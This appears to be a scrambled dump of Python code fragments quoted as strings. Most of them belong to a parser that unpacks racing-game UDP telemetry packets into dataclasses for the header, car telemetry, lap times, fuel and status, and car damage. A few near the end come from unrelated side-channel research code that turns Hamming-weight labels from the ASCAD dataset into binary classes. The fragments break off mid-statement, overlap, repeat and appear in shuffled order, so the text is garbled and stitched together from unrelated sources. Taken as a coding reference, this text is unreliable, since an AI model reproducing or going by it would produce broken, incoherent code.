\"\"\" return cls( unpacked[5],", "m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into", "_telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData", "i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) : (i +", "unpacked[6], unpacked[7], unpacked[8], unpacked[9], list([unpacked[10], unpacked[11], unpacked[12], unpacked[13]]), list([unpacked[14], unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18],", "Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message,", "\"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name = str(attribute_name)", "\"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod", "attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) ) player_car_damage_message.pop(\"m_brakesDamage\") return", "m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8 m_ersStoreEnergy: ctypes.c_float m_ersDeployMode: ctypes.c_uint8 m_ersHarvestedThisLapMGUK:", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" #", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = (", "unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to", "@dataclass class PacketHeader: \"\"\"PacketHeader struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8", "player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS:", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. \"\"\" lap_data_list =", "cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes): \"\"\"PacketCarTelemetryData struct.\"\"\"", "+ \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct", "+ \"\".join(message_format * 22), binary_message, ) # Remove header from struct unpacked_wo_header =", "m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked", "\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] ) @dataclass class PacketLapData(PacketWOAdditionalAttributes):", "as keys in dict. 
\"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict =", "self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData:", "unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class", "class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8],", "m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "+ PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) :", "= \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4],", "unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data)", "m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "\"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS:", "_telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from", "car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index", "\"rr\", 
\"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name =", "Unpacked struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0],", "unpacked = struct.unpack_from(format_string, binary_message) return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6],", "player data.\"\"\" import struct import ctypes from dataclasses import dataclass, asdict from typing", "m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class form binary UDP package.", "ctypes.c_float m_ersHarvestedThisLapMGUH: ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct", "car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__ | player_car_damage.__dict__.copy()", "construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6],", "list() for i in range(22): data = message_type.from_unpacked( unpacked_wo_header[ i * len(message_format) :", "CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank: ctypes.c_float m_fuelCapacity: ctypes.c_float m_fuelRemainingLaps: ctypes.c_float m_actualTyreCompound: ctypes.c_uint8 m_tyresAgeLaps: ctypes.c_uint8", "CarTelemetryData class. 
\"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19],", ") return cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "\"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list to attributes", "class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map", "package. Args: binary_message (str): Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\"", "# Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get lap", "ctypes.c_float m_ersDeployedThisLap: ctypes.c_float @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index", "unpacked[15], unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27],", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() )", "binary_message, ) # Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] #", "ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 
m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16", "struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "\"\"\"Struct classes for car telemetry. Classes parse data from binary format and extract", "\"m_tyresDamage\", ) ) player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes", "to position on car (fl, fr, rl, rr). Args: telemetry_values(list): List of telemetry", "= struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove", "representation of struct. \"\"\" car_damage_data_list = cls.get_message_list( packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData ) return", "self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData: \"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float", "used as keys in dict. \"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict", "telemetry for each active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data", "class form binary UDP package. Args: binary_message (str): Binary representation of package header.", "\"\"\"PacketCarTelemetryData struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "\"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class", "Args: packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" lap_data_list", "CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1) * len(CAR_TELEMETRY_DATA_FORMAT) ] )", "data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = (", "\"\"\"Create class form binary UDP package. Args: binary_message (str): Binary representation of package", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_damage = self.m_carDamageData[player_car_index] player_car_damage_message = ( self.m_header.__dict__", "1) * len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1],", "car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data from player", "self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to attributes", "unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass", ") ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list to attributes player_car_damage_message", "unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28], unpacked[29], unpacked[30]]), ) @dataclass class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header:", "* len(message_format) ] ) data_list.append(data) return data_list @dataclass class CarTelemetryData: \"\"\"CarTelemetryData struct.\"\"\" m_speed:", "self.m_header.m_player_car_index player_values = ( self.m_header.__dict__ | self.m_carStatusData[player_car_index].__dict__.copy() ) return player_values @dataclass class CarDamageData:", "Args: 
telemetry_values(list): List of telemetry values that should be mapped to attributes. attribute_name(str):", "i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i +", "player_car_damage_message.pop(\"m_tyresDamage\") # Map brake damage values from list to attributes player_car_damage_message = (", "player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\") player_telemetry_message.pop(\"m_surface_type\") return player_telemetry_message @dataclass class", "representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return", "player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map tyre inner temperature values from list", ": (i + 1) * len(message_format) ] ) data_list.append(data) return data_list @dataclass class", "struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16 m_sector2TimeInMS: ctypes.c_uint16 m_lapDistance: ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8", "active car car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[", "m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create class", "m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index:", "player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( 
player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_surface_temperature\") # Map", "_telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_inner_temperature\"], \"m_tyres_inner_temperature\", ) ) player_telemetry_message.pop(\"m_tyres_inner_temperature\") # Map brake temperature values from list", "ctypes from dataclasses import dataclass, asdict from typing import List PACKET_HEADER_FORMAT = \"<HBBBBQfLBB\"", "Binary representation of package header. \"\"\" format_string = \"<HBBBBQfLBB\" unpacked = struct.unpack_from(format_string, binary_message)", "List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear: ctypes.c_int8 @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message:", "# Map brake temperature values from list to attributes player_telemetry_message = ( player_telemetry_message", "\"\"\" return cls( unpacked[5], unpacked[6], unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21],", "ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm: ctypes.c_uint16 m_drs: ctypes.c_uint8", "unpacked[16], unpacked[17]]), list([unpacked[18], unpacked[19], unpacked[20], unpacked[21]]), unpacked[22], list([unpacked[23], unpacked[24], unpacked[25], unpacked[26]]), list([unpacked[27], unpacked[28],", "self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__ | player_car_telemetry.__dict__.copy() ) # Map tyre temperature values", "cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], ) def get_player_car_data(self) -> dict: \"\"\"Get data", "attribute_name: str) -> dict: \"\"\"Get single attributes from attributes list and allocate to", "PACKET_HEADER_FORMAT = 
\"<HBBBBQfLBB\" PACKET_CAR_TELEMETRY_DATA_FORMAT = \"BBb\" CAR_TELEMETRY_DATA_FORMAT = \"HfffBbHBBHHHHHBBBBBBBBHffffBBBB\" LAP_DATA_FORMAT = \"LLHHfffBBBBBBBBBBBBBBHHB\" CAR_STATUS_DATA_FORMAT", "from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class attributes. Args: unpacked (list): Unpacked", "from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_car_telemetry = self.m_car_telemetry_data[player_car_index] player_telemetry_message = ( self.m_header.__dict__", "struct containing all attributes to construct CarTelemetryData class. \"\"\" return cls( list([unpacked[0], unpacked[1],", "unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) #", "list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_tyresDamage\"], \"m_tyresDamage\", ) )", "_telemetry_list_to_attributes( player_car_damage_message[\"m_tyresWear\"], \"m_tyresWear\", ) ) player_car_damage_message.pop(\"m_tyresWear\") # Map tyre damage values from list", "data for each active car data_list = list() for i in range(22): data", ") return cls(packet_header, lap_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\"", "unpacked[5], unpacked[6], unpacked[7], unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader", "struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "Remove header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for", "cls.get_message_list( packet_header, binary_message, CAR_STATUS_DATA_FORMAT, CarStatusData ) return cls(packet_header, car_status_data_list) def get_player_car_data(self) -> dict:", 
"struct.\"\"\" m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form", "= list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT)", "m_speed: ctypes.c_uint16 m_throttle: ctypes.c_float m_steer: ctypes.c_float m_brake: ctypes.c_float m_clutch: ctypes.c_uint8 m_gear: ctypes.c_int8 m_engine_rpm:", "unpacked[1], unpacked[2], unpacked[3]]), list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]), list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]), ) @dataclass", "\"m_brakes_temperature\", ) ) player_telemetry_message.pop(\"m_brakes_temperature\") # Map tyres pressure values from list to attributes", "unpacked[7], unpacked[13], unpacked[15], unpacked[17], unpacked[18], unpacked[19], unpacked[20], unpacked[21], ) @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData", "return player_telemetry_message @dataclass class LapData: \"\"\"LapData struct.\"\"\" m_lastLapTimeInMS: ctypes.c_uint32 m_currentLapTimeInMS: ctypes.c_uint32 m_sector1TimeInMS: ctypes.c_uint16", "ctypes.c_uint32 m_currentLapNum: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List): \"\"\"Parse unpacked struct into class", "list to attributes player_car_damage_message = ( player_car_damage_message | _telemetry_list_to_attributes( player_car_damage_message[\"m_brakesDamage\"], \"m_brakesDamage\", ) )", "= str(attribute_name) + \"_\" + car_position_mapping[i] telemetry_values_dict[key_name] = telemetry_value return telemetry_values_dict @dataclass class", "player_car_telemetry.__dict__.copy() ) # Map tyre temperature values from list to attributes player_telemetry_message =", "class. binary_message (str): Binary representation of struct. \"\"\" car_status_data_list = cls.get_message_list( packet_header, binary_message,", "CarTelemetryData class. 
\"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[5], unpacked[6], unpacked[7],", "List[ctypes.c_uint16] m_tyres_surface_temperature: List[ctypes.c_uint8] m_tyres_inner_temperature: List[ctypes.c_uint8] m_engine_temperature: ctypes.c_uint16 m_tyres_pressure: List[ctypes.c_float] m_surface_type: List[ctypes.c_uint8] @classmethod def", "struct.\"\"\" m_packet_format: ctypes.c_uint16 m_game_major_version: ctypes.c_uint8 m_game_minor_version: ctypes.c_uint8 m_packet_version: ctypes.c_uint8 m_packet_id: ctypes.c_uint8 m_session_uid: ctypes.c_uint64", "ctypes.c_uint64 m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message:", "* len(CAR_TELEMETRY_DATA_FORMAT) ] ) car_telemetry_data_list.append(car_telemetry_data) return cls( packet_header, car_telemetry_data_list, unpacked_wo_header[-3], unpacked_wo_header[-2], unpacked_wo_header[-1], )", "object, ): \"\"\"Create class form binary UDP package. Args: packet_header (PacketHeader): PacketHeader class.", "ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str): \"\"\"Create", "struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(CAR_TELEMETRY_DATA_FORMAT * 22) + PACKET_CAR_TELEMETRY_DATA_FORMAT, binary_message, ) # Remove header", "header from struct unpacked_wo_header = unpacked[len(asdict(packet_header)) : :] # Get telemetry for each", "tyres pressure values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes(", "Binary representation of struct. \"\"\" # Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT +", "packet_header (PacketHeader): PacketHeader class. binary_message (str): Binary representation of struct. 
\"\"\" car_status_data_list =", "cls(packet_header, car_damage_data_list) def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index =", "[\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i, telemetry_value in enumerate(telemetry_values): key_name", "class PacketCarDamageData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carDamageData: List[CarDamageData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str):", "unpacked[8], unpacked[9], ) @dataclass class PacketWOAdditionalAttributes: \"\"\"PacketCarStatusData struct.\"\"\" m_header: PacketHeader @classmethod def get_message_list(", "m_session_time: ctypes.c_float m_frame_identifier: ctypes.c_uint32 m_player_car_index: ctypes.c_uint8 m_secondary_player_car_index: ctypes.c_uint8 @classmethod def from_binary(cls, binary_message: str):", "( self.m_header.__dict__ | self.m_lap_data[player_car_index].__dict__.copy() ) return player_values @dataclass class CarStatusData: \"\"\"CarStatusData struct.\"\"\" m_fuelInTank:", "m_lap_data: List[LapData] @classmethod def from_binary(cls, packet_header: PacketHeader, binary_message: str): \"\"\"Create class form binary", "def get_player_car_data(self) -> dict: \"\"\"Get data from player car.\"\"\" player_car_index = self.m_header.m_player_car_index player_values", "to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_pressure\"], \"m_tyres_pressure\", ) ) player_telemetry_message.pop(\"m_tyres_pressure\")", "dict. 
\"\"\" car_position_mapping = [\"rl\", \"rr\", \"fl\", \"fr\"] telemetry_values_dict = {} for i,", "# Get lap data for each active car data_list = list() for i", "\"\"\"CarStatusData struct.\"\"\" m_tyresWear: ctypes.c_float m_tyresDamage: ctypes.c_uint8 m_brakesDamage: ctypes.c_uint8 @classmethod def from_unpacked(cls, unpacked: List):", "in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i * len(CAR_TELEMETRY_DATA_FORMAT) : (i + 1)", "# Unpack struct unpacked = struct.unpack_from( PACKET_HEADER_FORMAT + \"\".join(message_format * 22), binary_message, )", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_brakes_temperature\"], \"m_brakes_temperature\",", "class PacketCarTelemetryData: \"\"\"PacketCarTelemetryData struct.\"\"\" m_header: PacketHeader m_car_telemetry_data: List[CarTelemetryData] m_mfd_panel_index: ctypes.c_uint8 m_mfd_panel_index_secondary_player: ctypes.c_uint8 m_suggested_gear:", "each active car data_list = list() for i in range(22): data = message_type.from_unpacked(", "car_telemetry_data_list = list() for i in range(22): car_telemetry_data = CarTelemetryData.from_unpacked( unpacked_wo_header[ i *", "construct CarTelemetryData class. \"\"\" return cls( unpacked[0], unpacked[1], unpacked[2], unpacked[3], unpacked[4], unpacked[8] )", ") @dataclass class PacketCarStatusData(PacketWOAdditionalAttributes): \"\"\"PacketCarStatusData struct.\"\"\" m_carStatusData: List[CarStatusData] @classmethod def from_binary(cls, packet_header: PacketHeader,", "values from list to attributes player_telemetry_message = ( player_telemetry_message | _telemetry_list_to_attributes( player_telemetry_message[\"m_tyres_surface_temperature\"], \"m_tyres_surface_temperature\"," ]
[ "Takes 9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed classes.", "weight labels and reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight", "traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000,", "la_bit) return traces, encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss,", "if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9,", "TraceSetHW def reduce_fixed_fixed(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and", "encode from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import PollutionType,", "4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces,", "if balanced: traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) if __name__", "traces, la_bit = balance(traces, la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False):", "__name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att,", "# TODO replace with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la", "np.random.binomial(1, .5, len(x)).astype(bool) filter_ixs = np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs],", "weight labels and reduces it to 2 semi-fixed classes. 
\"\"\" hamming_weight = np.argmax(y,", "variants from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import Database", "0), limits=(1000, 1000)) x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 =", "import Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x,", "from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import Database from", "\"\"\" Takes 9-class (categorical) hamming weight labels and reduces it to 2 classes:", "2 classes: semi-fixed and random. \"\"\" hamming_weight = np.argmax(y, axis=1) is_random = np.random.binomial(1,", "== '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000)) x9, y9, x9_att, y9_att", "labels and reduces it to 2 classes: semi-fixed and random. \"\"\" hamming_weight =", "= np.logical_or(hamming_weight < 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces,", "y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack()) x2, y2 = reduce_fixed_fixed(x9, y9, balanced=True) print(x2)", "to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl import encode from", "is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit = balance(traces, la_bit)", "is_high = hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces,", "replace with mlp_hw notebook variants from src.tools.dl import encode from src.tools.la import balance", "= hamming_weight[filter_ixs] > 4 traces, la_bit = x[filter_ixs], is_high if balanced: traces, la_bit", "import encode from src.tools.la import balance from src.trace_set.database import Database from src.trace_set.pollution import", "balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and 
reduces it to 2", "la_bit) return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical)", "as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace", "9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed classes. \"\"\"", "< 4, is_random) traces, la_bit = x[filter_ixs], is_random[filter_ixs] if balanced: traces, la_bit =", "axis=1) filter_ixs = hamming_weight != 4 is_high = hamming_weight[filter_ixs] > 4 traces, la_bit", "import numpy as np from src.dlla.hw import prepare_traces_dl from tensorflow.python.keras.utils.np_utils import to_categorical #", "from tensorflow.python.keras.utils.np_utils import to_categorical # TODO replace with mlp_hw notebook variants from src.tools.dl", "return traces, encode(la_bit, 2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming", "notebook variants from src.tools.dl import encode from src.tools.la import balance from src.trace_set.database import", "encode(la_bit, 2) if __name__ == '__main__': trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000))", "Database from src.trace_set.pollution import PollutionType, Pollution from src.trace_set.set_hw import TraceSetHW def reduce_fixed_fixed(x, y,", "2) def reduce_fixed_random(x, y, balanced=False): \"\"\" Takes 9-class (categorical) hamming weight labels and", "(categorical) hamming weight labels and reduces it to 2 semi-fixed classes. 
